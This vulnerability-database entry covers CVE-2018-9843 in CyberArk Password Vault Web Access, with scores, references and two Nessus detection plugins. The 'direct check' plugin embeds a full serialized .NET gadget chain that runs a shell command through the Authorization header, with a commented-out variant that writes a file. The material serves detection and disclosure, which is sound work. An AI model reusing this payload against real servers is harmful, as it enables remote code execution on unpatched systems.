Vulnerabilities > CVE-2018-9843 - Deserialization of Untrusted Data vulnerability in Cyberark Password Vault 10.0

047910
CVSS 7.5 - HIGH
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL
network
low complexity
cyberark
CWE-502
nessus
exploit available

Summary

The REST API in CyberArk Password Vault Web Access before 9.9.5 and 10.x before 10.1 allows remote attackers to execute arbitrary code via a serialized .NET object in an Authorization HTTP header.

Vulnerable Configurations

Part Description Count
Application
Cyberark
2

Common Weakness Enumeration (CWE)

Exploit-Db

descriptionCyberArk Password Vault Web Access < 9.9.5 / < 9.10 / 10.1 - Remote Code Execution. CVE-2018-9843. Webapps exploit for JSON platform
fileexploits/json/webapps/44429.txt
idEDB-ID:44429
last seen2018-05-24
modified2018-04-09
platformjson
port
published2018-04-09
reporterExploit-DB
sourcehttps://www.exploit-db.com/download/44429/
titleCyberArk Password Vault Web Access < 9.9.5 / < 9.10 / 10.1 - Remote Code Execution
typewebapps

Nessus

  • NASL familyCGI abuses
    NASL idCYBERARK_PASSWORD_VAULT_9_9_5.NASL
    descriptionThe version of CyberArk Password Vault Web Access running on the remote host is prior to 9.9.5, 9.10.x prior to 9.10.1, or is version 10.1. It is, therefore, vulnerable to a remote code execution vulnerability. Note that Nessus has not tested for this issue but has instead relied only on the application
    last seen2020-06-01
    modified2020-06-02
    plugin id108952
    published2018-04-10
    reporterThis script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/108952
    titleCyberArk Password Vault Web Access .NET Object Deserialization
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(108952);
      script_version("1.10");
      script_cvs_date("Date: 2019/10/07 15:15:27");
    
      script_cve_id("CVE-2018-9843");
      script_bugtraq_id(105180);
      script_xref(name:"IAVB", value:"2018-B-0121");
    
      script_name(english:"CyberArk Password Vault Web Access .NET Object Deserialization");
      script_summary(english:"Looks for the product and version in the logon page.");
    
      script_set_attribute(attribute:"synopsis", value:
    "An Identity Management application running on the remote host is affected by
    a remote code execution vulnerability.");
      script_set_attribute(attribute:"description", value:
    "The version of CyberArk Password Vault Web Access running on the
    remote host is prior to 9.9.5, 9.10.x prior to 9.10.1, or is version
    10.1. It is, therefore, vulnerable to a remote code execution
    vulnerability.
    
    Note that Nessus has not tested for this issue but has instead relied
    only on the application's self-reported version number.
    ");
      # https://www.redteam-pentesting.de/en/advisories/rt-sa-2017-014/-cyberark-password-vault-web-access-remote-code-execution
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?e1d84c64");
      script_set_attribute(attribute:"solution", value:
    "Upgrade to CyberArk Password Vault 9.9.5, 9.10.1, 10.2 or Later.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
      script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
      script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
      script_set_attribute(attribute:"cvss_score_source", value:"CVE-2018-9843");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2018/04/09");
      script_set_attribute(attribute:"patch_publication_date", value:"2018/02/28");
      script_set_attribute(attribute:"plugin_publication_date", value:"2018/04/10");
    
      script_set_attribute(attribute:"plugin_type", value:"remote");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:cyberark:password_vault");
      script_set_attribute(attribute:"stig_severity", value:"I");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_family(english:"CGI abuses");
    
      script_copyright(english:"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
    
      script_dependencies("cyberark_password_vault_detection.nbin");
      script_require_keys("Settings/ParanoidReport");
      script_require_ports("Services/www", 80, 443);
    
      exit(0);
    }
    
    include("audit.inc");
    include("global_settings.inc");
    include("misc_func.inc");
    include("http.inc");
    include("vcf.inc");
    include("vcf_extras.inc");
    
    if (report_paranoia < 2) audit(AUDIT_PARANOID);
    
    port = get_http_port(default:80);
    app = vcf::get_app_info(app:"CyberArk Password Vault Web Access", webapp:TRUE, port:port);
    
    constraints = 
    [
      {"min_version" : "0.0.0", "fixed_version" : "9.9.5"},
      {"min_version" : "9.10.0", "fixed_version" : "9.10.1"},
      {"min_version" : "10.1",  "fixed_version" : "10.2"}
    ];
    
    vcf::check_version_and_report(app_info:app, constraints:constraints, severity:SECURITY_HOLE, strict:FALSE);
    
  • NASL familyCGI abuses
    NASL idCYBERARK_PVWA_CVE-2018-9843.NASL
    descriptionThe CyberArk Password Vault Web Access running on the remote host is affected by a remote code execution vulnerability due to unsafe deserialization of an .NET object. An unauthenticated, remote attacker can exploit this, via a crafted a .NET object, to execute arbitrary .NET code in the context of the IIS server.
    last seen2020-06-01
    modified2020-06-02
    plugin id110287
    published2018-06-01
    reporterThis script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/110287
    titleCyberArk Password Vault Web Access .NET Object Deserialization (Direct Check)
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(110287);
      script_version("1.5");
      script_cvs_date("Date: 2019/10/07 15:15:27");
    
      script_cve_id("CVE-2018-9843");
      script_bugtraq_id(105180);
    
      script_name(english:"CyberArk Password Vault Web Access .NET Object Deserialization (Direct Check)");
      script_summary(english:"Sends a .NET object to trigger an error message.");
    
      script_set_attribute(attribute:"synopsis", value:
    "An Identity Management application running on the remote host is affected by
    a remote code execution vulnerability.");
      script_set_attribute(attribute:"description", value:
    "The CyberArk Password Vault Web Access running on the remote host is
    affected by a remote code execution vulnerability due to unsafe
    deserialization of an .NET object. An unauthenticated, remote
    attacker can exploit this, via a crafted a .NET object, to execute
    arbitrary .NET code in the context of the IIS server.");
    
      # https://www.redteam-pentesting.de/en/advisories/rt-sa-2017-014/-cyberark-password-vault-web-access-remote-code-execution
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?e1d84c64");
      script_set_attribute(attribute:"solution", value:
    "Upgrade to CyberArk Password Vault Web Access 9.9.5, 9.10.1, 10.2 or Later.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
      script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
      script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
      script_set_attribute(attribute:"cvss_score_source", value:"CVE-2018-9843");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2018/04/09");
      script_set_attribute(attribute:"patch_publication_date", value:"2018/02/28");
      script_set_attribute(attribute:"plugin_publication_date", value:"2018/06/01");
    
      script_set_attribute(attribute:"plugin_type", value:"remote");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:cyberark:password_vault");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_family(english:"CGI abuses");
    
      script_copyright(english:"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
    
      script_dependencies("cyberark_password_vault_detection.nbin");
      script_require_keys("installed_sw/CyberArk Password Vault Web Access");
      script_require_ports("Services/www", 80, 443);
    
      exit(0);
    }
    
    include("audit.inc");
    include("global_settings.inc");
    include("misc_func.inc");
    include("http.inc");
    include("install_func.inc");
    
    app   = 'CyberArk Password Vault Web Access';
    
    # Plugin will exit if app is not detected on host
    get_install_count(app_name:app, exit_if_zero:TRUE);
    
    # Plugin will exit if app is not detected on this port
    port = get_http_port(default:80);
    install = get_single_install(app_name:app, port:port, exit_if_unknown_ver:FALSE);
    
    url = "/PasswordVault/WebServices/PIMServices.svc/Applications/?Location=\&IncludeSublocations=true";
    
    cmd = 'ping -n 3 localhost';
    
    # vuln verification 
    #cmd = 'dir > c:\\Windows\\Temp\\hacked.txt';
    
    cmd = '/c ' + cmd;
    
    obj = raw_string(
    0x00,0x01,0x00,0x00,0x00,0xFF,0xFF,0xFF,0xFF,0x01,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x0C,0x02,0x00,0x00,0x00,0x49,0x53,0x79,0x73,0x74,0x65,0x6D,0x2C,0x20,0x56,
    0x65,0x72,0x73,0x69,0x6F,0x6E,0x3D,0x34,0x2E,0x30,0x2E,0x30,0x2E,0x30,0x2C,0x20,
    0x43,0x75,0x6C,0x74,0x75,0x72,0x65,0x3D,0x6E,0x65,0x75,0x74,0x72,0x61,0x6C,0x2C,
    0x20,0x50,0x75,0x62,0x6C,0x69,0x63,0x4B,0x65,0x79,0x54,0x6F,0x6B,0x65,0x6E,0x3D,
    0x62,0x37,0x37,0x61,0x35,0x63,0x35,0x36,0x31,0x39,0x33,0x34,0x65,0x30,0x38,0x39,
    0x05,0x01,0x00,0x00,0x00,0x84,0x01,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x43,0x6F,
    0x6C,0x6C,0x65,0x63,0x74,0x69,0x6F,0x6E,0x73,0x2E,0x47,0x65,0x6E,0x65,0x72,0x69,
    0x63,0x2E,0x53,0x6F,0x72,0x74,0x65,0x64,0x53,0x65,0x74,0x60,0x31,0x5B,0x5B,0x53,
    0x79,0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,0x67,0x2C,0x20,0x6D,0x73,
    0x63,0x6F,0x72,0x6C,0x69,0x62,0x2C,0x20,0x56,0x65,0x72,0x73,0x69,0x6F,0x6E,0x3D,
    0x34,0x2E,0x30,0x2E,0x30,0x2E,0x30,0x2C,0x20,0x43,0x75,0x6C,0x74,0x75,0x72,0x65,
    0x3D,0x6E,0x65,0x75,0x74,0x72,0x61,0x6C,0x2C,0x20,0x50,0x75,0x62,0x6C,0x69,0x63,
    0x4B,0x65,0x79,0x54,0x6F,0x6B,0x65,0x6E,0x3D,0x62,0x37,0x37,0x61,0x35,0x63,0x35,
    0x36,0x31,0x39,0x33,0x34,0x65,0x30,0x38,0x39,0x5D,0x5D,0x04,0x00,0x00,0x00,0x05,
    0x43,0x6F,0x75,0x6E,0x74,0x08,0x43,0x6F,0x6D,0x70,0x61,0x72,0x65,0x72,0x07,0x56,
    0x65,0x72,0x73,0x69,0x6F,0x6E,0x05,0x49,0x74,0x65,0x6D,0x73,0x00,0x03,0x00,0x06,
    0x08,0x8D,0x01,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x43,0x6F,0x6C,0x6C,0x65,0x63,
    0x74,0x69,0x6F,0x6E,0x73,0x2E,0x47,0x65,0x6E,0x65,0x72,0x69,0x63,0x2E,0x43,0x6F,
    0x6D,0x70,0x61,0x72,0x69,0x73,0x6F,0x6E,0x43,0x6F,0x6D,0x70,0x61,0x72,0x65,0x72,
    0x60,0x31,0x5B,0x5B,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,
    0x67,0x2C,0x20,0x6D,0x73,0x63,0x6F,0x72,0x6C,0x69,0x62,0x2C,0x20,0x56,0x65,0x72,
    0x73,0x69,0x6F,0x6E,0x3D,0x34,0x2E,0x30,0x2E,0x30,0x2E,0x30,0x2C,0x20,0x43,0x75,
    0x6C,0x74,0x75,0x72,0x65,0x3D,0x6E,0x65,0x75,0x74,0x72,0x61,0x6C,0x2C,0x20,0x50,
    0x75,0x62,0x6C,0x69,0x63,0x4B,0x65,0x79,0x54,0x6F,0x6B,0x65,0x6E,0x3D,0x62,0x37,
    0x37,0x61,0x35,0x63,0x35,0x36,0x31,0x39,0x33,0x34,0x65,0x30,0x38,0x39,0x5D,0x5D,
    0x08,0x02,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x09,0x03,0x00,0x00,0x00,0x02,0x00,
    0x00,0x00,0x09,0x04,0x00,0x00,0x00,0x04,0x03,0x00,0x00,0x00,0x8D,0x01,0x53,0x79,
    0x73,0x74,0x65,0x6D,0x2E,0x43,0x6F,0x6C,0x6C,0x65,0x63,0x74,0x69,0x6F,0x6E,0x73,
    0x2E,0x47,0x65,0x6E,0x65,0x72,0x69,0x63,0x2E,0x43,0x6F,0x6D,0x70,0x61,0x72,0x69,
    0x73,0x6F,0x6E,0x43,0x6F,0x6D,0x70,0x61,0x72,0x65,0x72,0x60,0x31,0x5B,0x5B,0x53,
    0x79,0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,0x67,0x2C,0x20,0x6D,0x73,
    0x63,0x6F,0x72,0x6C,0x69,0x62,0x2C,0x20,0x56,0x65,0x72,0x73,0x69,0x6F,0x6E,0x3D,
    0x34,0x2E,0x30,0x2E,0x30,0x2E,0x30,0x2C,0x20,0x43,0x75,0x6C,0x74,0x75,0x72,0x65,
    0x3D,0x6E,0x65,0x75,0x74,0x72,0x61,0x6C,0x2C,0x20,0x50,0x75,0x62,0x6C,0x69,0x63,
    0x4B,0x65,0x79,0x54,0x6F,0x6B,0x65,0x6E,0x3D,0x62,0x37,0x37,0x61,0x35,0x63,0x35,
    0x36,0x31,0x39,0x33,0x34,0x65,0x30,0x38,0x39,0x5D,0x5D,0x01,0x00,0x00,0x00,0x0B,
    0x5F,0x63,0x6F,0x6D,0x70,0x61,0x72,0x69,0x73,0x6F,0x6E,0x03,0x22,0x53,0x79,0x73,
    0x74,0x65,0x6D,0x2E,0x44,0x65,0x6C,0x65,0x67,0x61,0x74,0x65,0x53,0x65,0x72,0x69,
    0x61,0x6C,0x69,0x7A,0x61,0x74,0x69,0x6F,0x6E,0x48,0x6F,0x6C,0x64,0x65,0x72,0x09,
    0x05,0x00,0x00,0x00,0x11,0x04,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x06,0x06,0x00,
    0x00) +
    mkword(strlen(cmd)) + cmd +
    raw_string(
    0x06,0x07,0x00,0x00,0x00,0x03,0x63,0x6D,
    0x64,0x04,0x05,0x00,0x00,0x00,0x22,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x44,0x65,
    0x6C,0x65,0x67,0x61,0x74,0x65,0x53,0x65,0x72,0x69,0x61,0x6C,0x69,0x7A,0x61,0x74,
    0x69,0x6F,0x6E,0x48,0x6F,0x6C,0x64,0x65,0x72,0x03,0x00,0x00,0x00,0x08,0x44,0x65,
    0x6C,0x65,0x67,0x61,0x74,0x65,0x07,0x6D,0x65,0x74,0x68,0x6F,0x64,0x30,0x07,0x6D,
    0x65,0x74,0x68,0x6F,0x64,0x31,0x03,0x03,0x03,0x30,0x53,0x79,0x73,0x74,0x65,0x6D,
    0x2E,0x44,0x65,0x6C,0x65,0x67,0x61,0x74,0x65,0x53,0x65,0x72,0x69,0x61,0x6C,0x69,
    0x7A,0x61,0x74,0x69,0x6F,0x6E,0x48,0x6F,0x6C,0x64,0x65,0x72,0x2B,0x44,0x65,0x6C,
    0x65,0x67,0x61,0x74,0x65,0x45,0x6E,0x74,0x72,0x79,0x2F,0x53,0x79,0x73,0x74,0x65,
    0x6D,0x2E,0x52,0x65,0x66,0x6C,0x65,0x63,0x74,0x69,0x6F,0x6E,0x2E,0x4D,0x65,0x6D,
    0x62,0x65,0x72,0x49,0x6E,0x66,0x6F,0x53,0x65,0x72,0x69,0x61,0x6C,0x69,0x7A,0x61,
    0x74,0x69,0x6F,0x6E,0x48,0x6F,0x6C,0x64,0x65,0x72,0x2F,0x53,0x79,0x73,0x74,0x65,
    0x6D,0x2E,0x52,0x65,0x66,0x6C,0x65,0x63,0x74,0x69,0x6F,0x6E,0x2E,0x4D,0x65,0x6D,
    0x62,0x65,0x72,0x49,0x6E,0x66,0x6F,0x53,0x65,0x72,0x69,0x61,0x6C,0x69,0x7A,0x61,
    0x74,0x69,0x6F,0x6E,0x48,0x6F,0x6C,0x64,0x65,0x72,0x09,0x08,0x00,0x00,0x00,0x09,
    0x09,0x00,0x00,0x00,0x09,0x0A,0x00,0x00,0x00,0x04,0x08,0x00,0x00,0x00,0x30,0x53,
    0x79,0x73,0x74,0x65,0x6D,0x2E,0x44,0x65,0x6C,0x65,0x67,0x61,0x74,0x65,0x53,0x65,
    0x72,0x69,0x61,0x6C,0x69,0x7A,0x61,0x74,0x69,0x6F,0x6E,0x48,0x6F,0x6C,0x64,0x65,
    0x72,0x2B,0x44,0x65,0x6C,0x65,0x67,0x61,0x74,0x65,0x45,0x6E,0x74,0x72,0x79,0x07,
    0x00,0x00,0x00,0x04,0x74,0x79,0x70,0x65,0x08,0x61,0x73,0x73,0x65,0x6D,0x62,0x6C,
    0x79,0x06,0x74,0x61,0x72,0x67,0x65,0x74,0x12,0x74,0x61,0x72,0x67,0x65,0x74,0x54,
    0x79,0x70,0x65,0x41,0x73,0x73,0x65,0x6D,0x62,0x6C,0x79,0x0E,0x74,0x61,0x72,0x67,
    0x65,0x74,0x54,0x79,0x70,0x65,0x4E,0x61,0x6D,0x65,0x0A,0x6D,0x65,0x74,0x68,0x6F,
    0x64,0x4E,0x61,0x6D,0x65,0x0D,0x64,0x65,0x6C,0x65,0x67,0x61,0x74,0x65,0x45,0x6E,
    0x74,0x72,0x79,0x01,0x01,0x02,0x01,0x01,0x01,0x03,0x30,0x53,0x79,0x73,0x74,0x65,
    0x6D,0x2E,0x44,0x65,0x6C,0x65,0x67,0x61,0x74,0x65,0x53,0x65,0x72,0x69,0x61,0x6C,
    0x69,0x7A,0x61,0x74,0x69,0x6F,0x6E,0x48,0x6F,0x6C,0x64,0x65,0x72,0x2B,0x44,0x65,
    0x6C,0x65,0x67,0x61,0x74,0x65,0x45,0x6E,0x74,0x72,0x79,0x06,0x0B,0x00,0x00,0x00,
    0xB0,0x02,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x46,0x75,0x6E,0x63,0x60,0x33,0x5B,
    0x5B,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,0x67,0x2C,0x20,
    0x6D,0x73,0x63,0x6F,0x72,0x6C,0x69,0x62,0x2C,0x20,0x56,0x65,0x72,0x73,0x69,0x6F,
    0x6E,0x3D,0x34,0x2E,0x30,0x2E,0x30,0x2E,0x30,0x2C,0x20,0x43,0x75,0x6C,0x74,0x75,
    0x72,0x65,0x3D,0x6E,0x65,0x75,0x74,0x72,0x61,0x6C,0x2C,0x20,0x50,0x75,0x62,0x6C,
    0x69,0x63,0x4B,0x65,0x79,0x54,0x6F,0x6B,0x65,0x6E,0x3D,0x62,0x37,0x37,0x61,0x35,
    0x63,0x35,0x36,0x31,0x39,0x33,0x34,0x65,0x30,0x38,0x39,0x5D,0x2C,0x5B,0x53,0x79,
    0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,0x67,0x2C,0x20,0x6D,0x73,0x63,
    0x6F,0x72,0x6C,0x69,0x62,0x2C,0x20,0x56,0x65,0x72,0x73,0x69,0x6F,0x6E,0x3D,0x34,
    0x2E,0x30,0x2E,0x30,0x2E,0x30,0x2C,0x20,0x43,0x75,0x6C,0x74,0x75,0x72,0x65,0x3D,
    0x6E,0x65,0x75,0x74,0x72,0x61,0x6C,0x2C,0x20,0x50,0x75,0x62,0x6C,0x69,0x63,0x4B,
    0x65,0x79,0x54,0x6F,0x6B,0x65,0x6E,0x3D,0x62,0x37,0x37,0x61,0x35,0x63,0x35,0x36,
    0x31,0x39,0x33,0x34,0x65,0x30,0x38,0x39,0x5D,0x2C,0x5B,0x53,0x79,0x73,0x74,0x65,
    0x6D,0x2E,0x44,0x69,0x61,0x67,0x6E,0x6F,0x73,0x74,0x69,0x63,0x73,0x2E,0x50,0x72,
    0x6F,0x63,0x65,0x73,0x73,0x2C,0x20,0x53,0x79,0x73,0x74,0x65,0x6D,0x2C,0x20,0x56,
    0x65,0x72,0x73,0x69,0x6F,0x6E,0x3D,0x34,0x2E,0x30,0x2E,0x30,0x2E,0x30,0x2C,0x20,
    0x43,0x75,0x6C,0x74,0x75,0x72,0x65,0x3D,0x6E,0x65,0x75,0x74,0x72,0x61,0x6C,0x2C,
    0x20,0x50,0x75,0x62,0x6C,0x69,0x63,0x4B,0x65,0x79,0x54,0x6F,0x6B,0x65,0x6E,0x3D,
    0x62,0x37,0x37,0x61,0x35,0x63,0x35,0x36,0x31,0x39,0x33,0x34,0x65,0x30,0x38,0x39,
    0x5D,0x5D,0x06,0x0C,0x00,0x00,0x00,0x4B,0x6D,0x73,0x63,0x6F,0x72,0x6C,0x69,0x62,
    0x2C,0x20,0x56,0x65,0x72,0x73,0x69,0x6F,0x6E,0x3D,0x34,0x2E,0x30,0x2E,0x30,0x2E,
    0x30,0x2C,0x20,0x43,0x75,0x6C,0x74,0x75,0x72,0x65,0x3D,0x6E,0x65,0x75,0x74,0x72,
    0x61,0x6C,0x2C,0x20,0x50,0x75,0x62,0x6C,0x69,0x63,0x4B,0x65,0x79,0x54,0x6F,0x6B,
    0x65,0x6E,0x3D,0x62,0x37,0x37,0x61,0x35,0x63,0x35,0x36,0x31,0x39,0x33,0x34,0x65,
    0x30,0x38,0x39,0x0A,0x06,0x0D,0x00,0x00,0x00,0x49,0x53,0x79,0x73,0x74,0x65,0x6D,
    0x2C,0x20,0x56,0x65,0x72,0x73,0x69,0x6F,0x6E,0x3D,0x34,0x2E,0x30,0x2E,0x30,0x2E,
    0x30,0x2C,0x20,0x43,0x75,0x6C,0x74,0x75,0x72,0x65,0x3D,0x6E,0x65,0x75,0x74,0x72,
    0x61,0x6C,0x2C,0x20,0x50,0x75,0x62,0x6C,0x69,0x63,0x4B,0x65,0x79,0x54,0x6F,0x6B,
    0x65,0x6E,0x3D,0x62,0x37,0x37,0x61,0x35,0x63,0x35,0x36,0x31,0x39,0x33,0x34,0x65,
    0x30,0x38,0x39,0x06,0x0E,0x00,0x00,0x00,0x1A,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,
    0x44,0x69,0x61,0x67,0x6E,0x6F,0x73,0x74,0x69,0x63,0x73,0x2E,0x50,0x72,0x6F,0x63,
    0x65,0x73,0x73,0x06,0x0F,0x00,0x00,0x00,0x05,0x53,0x74,0x61,0x72,0x74,0x09,0x10,
    0x00,0x00,0x00,0x04,0x09,0x00,0x00,0x00,0x2F,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,
    0x52,0x65,0x66,0x6C,0x65,0x63,0x74,0x69,0x6F,0x6E,0x2E,0x4D,0x65,0x6D,0x62,0x65,
    0x72,0x49,0x6E,0x66,0x6F,0x53,0x65,0x72,0x69,0x61,0x6C,0x69,0x7A,0x61,0x74,0x69,
    0x6F,0x6E,0x48,0x6F,0x6C,0x64,0x65,0x72,0x07,0x00,0x00,0x00,0x04,0x4E,0x61,0x6D,
    0x65,0x0C,0x41,0x73,0x73,0x65,0x6D,0x62,0x6C,0x79,0x4E,0x61,0x6D,0x65,0x09,0x43,
    0x6C,0x61,0x73,0x73,0x4E,0x61,0x6D,0x65,0x09,0x53,0x69,0x67,0x6E,0x61,0x74,0x75,
    0x72,0x65,0x0A,0x53,0x69,0x67,0x6E,0x61,0x74,0x75,0x72,0x65,0x32,0x0A,0x4D,0x65,
    0x6D,0x62,0x65,0x72,0x54,0x79,0x70,0x65,0x10,0x47,0x65,0x6E,0x65,0x72,0x69,0x63,
    0x41,0x72,0x67,0x75,0x6D,0x65,0x6E,0x74,0x73,0x01,0x01,0x01,0x01,0x01,0x00,0x03,
    0x08,0x0D,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x54,0x79,0x70,0x65,0x5B,0x5D,0x09,
    0x0F,0x00,0x00,0x00,0x09,0x0D,0x00,0x00,0x00,0x09,0x0E,0x00,0x00,0x00,0x06,0x14,
    0x00,0x00,0x00,0x3E,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x44,0x69,0x61,0x67,0x6E,
    0x6F,0x73,0x74,0x69,0x63,0x73,0x2E,0x50,0x72,0x6F,0x63,0x65,0x73,0x73,0x20,0x53,
    0x74,0x61,0x72,0x74,0x28,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,
    0x6E,0x67,0x2C,0x20,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,
    0x67,0x29,0x06,0x15,0x00,0x00,0x00,0x3E,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x44,
    0x69,0x61,0x67,0x6E,0x6F,0x73,0x74,0x69,0x63,0x73,0x2E,0x50,0x72,0x6F,0x63,0x65,
    0x73,0x73,0x20,0x53,0x74,0x61,0x72,0x74,0x28,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,
    0x53,0x74,0x72,0x69,0x6E,0x67,0x2C,0x20,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x53,
    0x74,0x72,0x69,0x6E,0x67,0x29,0x08,0x00,0x00,0x00,0x0A,0x01,0x0A,0x00,0x00,0x00,
    0x09,0x00,0x00,0x00,0x06,0x16,0x00,0x00,0x00,0x07,0x43,0x6F,0x6D,0x70,0x61,0x72,
    0x65,0x09,0x0C,0x00,0x00,0x00,0x06,0x18,0x00,0x00,0x00,0x0D,0x53,0x79,0x73,0x74,
    0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,0x67,0x06,0x19,0x00,0x00,0x00,0x2B,0x49,
    0x6E,0x74,0x33,0x32,0x20,0x43,0x6F,0x6D,0x70,0x61,0x72,0x65,0x28,0x53,0x79,0x73,
    0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,0x67,0x2C,0x20,0x53,0x79,0x73,0x74,
    0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,0x67,0x29,0x06,0x1A,0x00,0x00,0x00,0x32,
    0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x49,0x6E,0x74,0x33,0x32,0x20,0x43,0x6F,0x6D,
    0x70,0x61,0x72,0x65,0x28,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,
    0x6E,0x67,0x2C,0x20,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,
    0x67,0x29,0x08,0x00,0x00,0x00,0x0A,0x01,0x10,0x00,0x00,0x00,0x08,0x00,0x00,0x00,
    0x06,0x1B,0x00,0x00,0x00,0x71,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x43,0x6F,0x6D,
    0x70,0x61,0x72,0x69,0x73,0x6F,0x6E,0x60,0x31,0x5B,0x5B,0x53,0x79,0x73,0x74,0x65,
    0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,0x67,0x2C,0x20,0x6D,0x73,0x63,0x6F,0x72,0x6C,
    0x69,0x62,0x2C,0x20,0x56,0x65,0x72,0x73,0x69,0x6F,0x6E,0x3D,0x34,0x2E,0x30,0x2E,
    0x30,0x2E,0x30,0x2C,0x20,0x43,0x75,0x6C,0x74,0x75,0x72,0x65,0x3D,0x6E,0x65,0x75,
    0x74,0x72,0x61,0x6C,0x2C,0x20,0x50,0x75,0x62,0x6C,0x69,0x63,0x4B,0x65,0x79,0x54,
    0x6F,0x6B,0x65,0x6E,0x3D,0x62,0x37,0x37,0x61,0x35,0x63,0x35,0x36,0x31,0x39,0x33,
    0x34,0x65,0x30,0x38,0x39,0x5D,0x5D,0x09,0x0C,0x00,0x00,0x00,0x0A,0x09,0x0C,0x00,
    0x00,0x00,0x09,0x18,0x00,0x00,0x00,0x09,0x16,0x00,0x00,0x00,0x0A,0x0B
    ); 
    
    # PVWA can be slow to respond
    http_set_read_timeout(30);
    
    token = base64(str: obj);
    res = http_send_recv3(
            port        : port, 
            method      : 'GET',
            item        : url,
            add_headers : make_array('authorization', token),
            content_type: 'application/json',
            fetch404    : TRUE,
            exit_on_fail: TRUE
          );
    
    if(isnull(res[2]))
      audit(AUDIT_RESP_NOT, port, 'a GET request: No data in the response body');
    
    # 
    # Patched:
    # 403 
    # {"ErrorCode":"CAWS00001E","ErrorMessage":"Connection to the Vault was terminated."}
    if (res[2] !~ "Unable to cast object of type.* to type 'CyberArk.Services.Web.SessionIdentifiers")
    {
      audit(AUDIT_INST_VER_NOT_VULN, app, install['version']);
    }
    
    #
    # Vulenrable:
    # 403
    # {"ErrorCode":"CAWS00001E","ErrorMessage":"Error raised while trying to establish session using session token provided. Error: Unable to cast object of type 'System.Collections.Generic.SortedSet`1[System.String]' to type 'CyberArk.Services.Web.SessionIdentifiers'."}
    #
    report =
      '\nNessus was able to detect the .NET deserialization vulnerability by' +
      '\nsending a crafted .NET object.' +
      '\n';
    security_report_v4(port:port, severity:SECURITY_HOLE, extra:report);
    

Packetstorm

data sourcehttps://packetstormsecurity.com/files/download/147105/rt-sa-2017-014.txt
idPACKETSTORM:147105
last seen2018-04-10
published2018-04-09
reporterredteam-pentesting.de
sourcehttps://packetstormsecurity.com/files/147105/CyberArk-Password-Vault-Web-Access-Remote-Code-Execution.html
titleCyberArk Password Vault Web Access Remote Code Execution

The Hacker News

idTHN:A7F528F861EE01F1A3D095D085EDB80F
last seen2018-04-09
modified2018-04-09
published2018-04-09
reporterMohit Kumar
sourcehttps://thehackernews.com/2018/04/enterprise-password-vault.html
titleCritical Code Execution Flaw Found in CyberArk Enterprise Password Vault